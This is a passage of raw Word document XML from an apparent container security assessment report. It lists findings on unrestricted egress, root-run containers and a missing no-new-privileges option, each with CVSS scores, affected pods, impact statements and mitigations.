              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1346C2D7" wp14:editId="1BEA0968">
                  <wp:extent cx="5926302" cy="946205"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12" name="Drawing 12" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 12" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId43"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6011209" cy="959761"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="12FCBA40" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18BD911F" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B7502E4" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="126D10FB" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0481DF6D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Vector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05651897" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="6F2F69C9" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D312287" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected Container/Pod(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6106A1D5"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api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="567B4DE8"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gui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53689BD7" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>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rcl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="4A7A2841" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FA2654" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F9D23FA" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>If an attacker is in position to initiate connections from a container to the external/untrusted network, exploitation could be trivial.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="540F85E2" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6717F6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0F03BF" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Configure and restrict communications from each running containers using iptables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72902496" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=193928">
        <w:bookmarkStart w:id="32" w:name="_Toc199711441"/>
        <w:bookmarkStart w:id="33" w:name="_Toc200562843"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>193928: Containers Running with Root Privileges (Root Containers)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FDC20A"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Medium)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>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11584D65" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ED88781" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D320D3" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Container running as root user introduces security vulnerabilities due to the elevated privileges associated with the root user. Running containers as root increases the risk of potential compromise of the system hosting the container.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059F2B01" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46416BA7" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>It was observed that the containers mentioned below are running with UID 0.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56CBB88A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60735BED" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00301BF3">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Note:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> If running containers as root is a specific product requirement or necessity due to dependencies or functionality, the severity of the defect related to running containers as root may be lowered. Please share your justification on this.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="449A6C1D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73326647" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00825DC2" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00825DC2">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reference:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8AB883" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://medium.com/better-programming/running-a-container-with-a-non-root-user-e35830d1f42a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D56A35" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4626F3E2" wp14:editId="3C3A1155">
                  <wp:extent cx="5930900" cy="3546282"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="13" name="Drawing 13" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 13" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId45"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5939996" cy="3551721"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="611ABDE1" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039DE2E1" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B157447" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="35E11035" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F344C4" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Vector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A1FFD9" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="285144D5" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16379C12" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Affected Container/Pod(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6B17B5"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api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D796B4C"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gui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561615DB" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>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rcl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="1669C51E" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50CA63CA" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F631000" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Root access can lead to unauthorized access to sensitive data, modifications to the container and potentially disrupt the availability of service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="01EAF8A7" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72BBBFC6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B911C2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Modify the container configurations to run as non-root users, following the principle of least privilege. This reduces the impact of potential security breaches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E51C27C" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194312">
        <w:bookmarkStart w:id="34" w:name="_Toc199711442"/>
        <w:bookmarkStart w:id="35" w:name="_Toc200562844"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194312: Restrict Container From Acquiring Additional Privileges (No-New-Privileges)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>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5DBB15C8" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="119EE226" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="175680C8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>It was observed that containers were run without 'no-new-privileges' security option.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C973C3D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00EEEA39" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="001C002E" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C002E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689C3C22" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CBBE3BB" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://docs.datadoghq.com/security_platform/default_rules/cis-docker-1.2.0-5.25/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1C5A25" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D383643" wp14:editId="10FA9572">
                  <wp:extent cx="5927561" cy="326004"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="14" name="Drawing 14" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 14" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId47"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6110744" cy="336079"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="69E2926C" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D3F796A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected Container/Pod(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3721B698"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api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00243553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-official</w:t>
            </w:r>
          </w:p>
